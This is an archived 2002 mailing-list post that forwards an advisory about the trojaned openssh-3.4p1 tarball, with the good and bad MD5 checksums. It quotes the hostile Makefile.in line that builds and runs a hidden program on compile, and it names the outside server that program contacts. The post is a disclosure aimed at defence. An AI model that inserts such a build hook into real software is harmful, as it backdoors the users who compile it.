[Linux-Anyway] openssh-3.4p1.tar.gz distribution recently trojaned

  • From: Godwin Stewart <gstewart@xxxxxxxxxxx>
  • To: Beginning With Linux <BeginningWithLinux@xxxxxxxxxxxxxxx>,Linux list <linux@xxxxxxxxxxxxxxx>,Linux Newbies <LINUX_Newbies@xxxxxxxxxxxxxxx>,Linux-Anyway <Linux-Anyway@xxxxxxxxxxxxx>
  • Date: Thu, 1 Aug 2002 15:41:04 +0200

X-POSTED to:

BeginningWithLinux@xxxxxxxxxxxxxxx
linux@xxxxxxxxxxxxxxx
LINUX_Newbies@xxxxxxxxxxxxxxx
Linux-Anyway@xxxxxxxxxxxxx



From
http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security

----- Forwarded message from Edwin Groothuis <edwin@xxxxxxxxxxx> -----

Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis <edwin@xxxxxxxxxxx>
To: incidents@xxxxxxxxxxxxxxxxx
Subject: openssh-3.4p1.tar.gz trojaned

Greetings,

Just want to inform you that the OpenSSH package op ftp.openbsd.org
(and probably all its mirrors now) it trojaned:

     ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

The OpenBSD people have been informed about it (via email to
deraadt@xxxxxxxxxxx and via irc.openprojects.org/#openbsd)


The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
  all: libopenbsd-compat.a
+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
../bf-test.out &

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to an
server running on 203.62.158.32:6667 (web.snsonline.net).

[1] http://www.mavetju.org/~edwin/bf-test.c
[2] http://www.mavetju.org/~edwin/bf-output.sh

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
     MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
     MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

-- 
Seen in the classified ads:
NICE PARACHUTE: NEVER OPENED - USED ONCE
 ____________________________________________
| G. Stewart   --   gstewart@xxxxxxxxxxxxxxx |
|                   gstewart@xxxxxxxxxxx     |
|--------------------------------------------|
| Linux User Group de Touraine               |
|                http://www.lug-touraine.org |
 ____________________________________________
To unsubcribe send e-mail with the word unsubscribe in the body to:   
Linux-Anyway-Request@xxxxxxxxxxxxx?body=unsubscribe

Other related posts:

  • » [Linux-Anyway] openssh-3.4p1.tar.gz distribution recently trojaned
  1. Home
  2. linux-anyway
  3. Archive
  4. 08-2002